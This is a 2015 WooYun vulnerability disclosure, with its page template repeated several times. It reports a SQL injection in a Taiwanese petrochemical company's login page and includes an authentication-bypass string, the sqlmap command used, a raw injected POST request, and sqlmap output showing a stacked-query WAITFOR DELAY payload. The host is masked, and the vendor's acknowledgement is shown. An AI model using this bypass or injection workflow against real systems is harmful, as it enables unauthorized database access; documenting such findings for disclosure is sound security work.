中美和石油化學股份有限公司某管理系统存在注入（臺灣地區）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0162845

漏洞标题：中美和石油化學股份有限公司某管理系统存在注入（臺灣地區）

漏洞作者：路人甲

提交时间：2015-12-21 12:37

修复时间：2016-02-04 17:47

公开时间：2016-02-04 17:47

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-21：细节已通知厂商并且等待厂商处理中
2015-12-23：厂商已经确认，细节仅向厂商公开
2016-01-02：细节向核心白帽子及相关领域专家公开
2016-01-12：细节向普通白帽子公开
2016-01-22：细节向实习白帽子公开
2016-02-04：细节向公众公开

简要描述：

一并解决吧！！！

详细说明：

http://**.**.**.**/
问题出现在登录Login.aspx处，万能密码' OR '1'='1 可绕过。
POST型注入，字段txtPASSWORD，dba权限

sqlmap.py -r 1.txt --dbms=MSSQL -p txtPASSWORD --random-angent

POST /Login.aspx HTTP/1.1
Cache-Control: no-cache
Referer: http://**.**.**.**/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36 Netsparker
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: **.**.**.**
Cookie: ASP.NET_SessionId=xeo3barzxapk44e2zs0pib45
Accept-Encoding: gzip, deflate
Content-Length: 563
Content-Type: application/x-www-form-urlencoded
__EVENTTARGET=3&__EVENTARGUMENT=3&__LASTFOCUS=3&__VIEWSTATE=%2fwEPDwUKMTg5Mjc2MzI4OA9kFgICBA9kFggCAQ8QZGQWAWZkAgMPD2QWAh4Hb25Gb2N1cwUOdGhpcy5zZWxlY3QoKTtkAgUPD2QWAh8ABQ50aGlzLnNlbGVjdCgpO2QCCw9kFgJmDxYEHglhY2Nlc3NLZXlkHgdvbmNsaWNrBQ93aW5kb3cuY2xvc2UoKTtkZCfied6YDsWze46PyWiwNud37lZo&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2fwEWCQLUxsCoBgKOk%2f6oCwLp0r%2bzAQKT0qL0DwL1pt%2fYCwKViPuNBwLj9MDHDQLCgsKRCALah%2bbzAv03XDgbetv08P2oUI%2b%2ffE7MZbX0&radRunSystem=online&txtUSERID=3&txtPASSWORD=%27+OR+%27ns%27%3d%27ns&radLanguage=zh-tw&btnLOGIN=%e7%99%bb%e5%85%a5

漏洞证明：

POST parameter 'txtPASSWORD' is vulnerable. Do you want to keep testing the othe
rs (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 61 HTTP(s) re
quests:
---
Parameter: txtPASSWORD (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: __EVENTTARGET=3&__EVENTARGUMENT=3&__LASTFOCUS=3&__VIEWSTATE=/wEPDwU
KMTg5Mjc2MzI4OA9kFgICBA9kFgoCAQ8QZGQWAWZkAgMPD2QWAh4Hb25Gb2N1cwUOdGhpcy5zZWxlY3Q
oKTtkAgUPD2QWAh8ABQ50aGlzLnNlbGVjdCgpO2QCCw9kFgJmDxYEHglhY2Nlc3NLZXlkHgdvbmNsaWN
rBQ93aW5kb3cuY2xvc2UoKTtkAg0PDxYCHgRUZXh0BSros4fmlpnluqvpqZforYkgOiDnmbvlhaXkvb/
nlKjogIXkuI3lrZjlnKhkZGRvoTowmxSXyBUHl9vMnrZUKnt7tA==&__VIEWSTATEGENERATOR=C2EE9
ABB&__EVENTVALIDATION=/wEWCQLbj5iACAKOk/6oCwLp0r+zAQKT0qL0DwL1pt/YCwKViPuNBwLj9M
DHDQLCgsKRCALah+bzAtLO4467kocBz3WW8/os3r73lC2+&radRunSystem=online&txtUSERID=3&t
xtPASSWORD=1ns';WAITFOR DELAY '0:0:5'--&radLanguage=zh-tw&btnLOGIN=%e7%99%bb%e5%
85%a5
---

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：16

确认时间：2015-12-23 04:18

厂商回复：

感謝通報

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0162845

漏洞标题：中美和石油化學股份有限公司某管理系统存在注入（臺灣地區）

相关厂商：中美和石油化學股份有限公司

漏洞作者：路人甲

提交时间：2015-12-21 12:37

修复时间：2016-02-04 17:47

公开时间：2016-02-04 17:47

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0162845

漏洞标题：中美和石油化學股份有限公司某管理系统存在注入（臺灣地區）

相关厂商：中美和石油化學股份有限公司

漏洞作者： 路人甲

提交时间：2015-12-21 12:37

修复时间：2016-02-04 17:47

公开时间：2016-02-04 17:47

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0162845"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云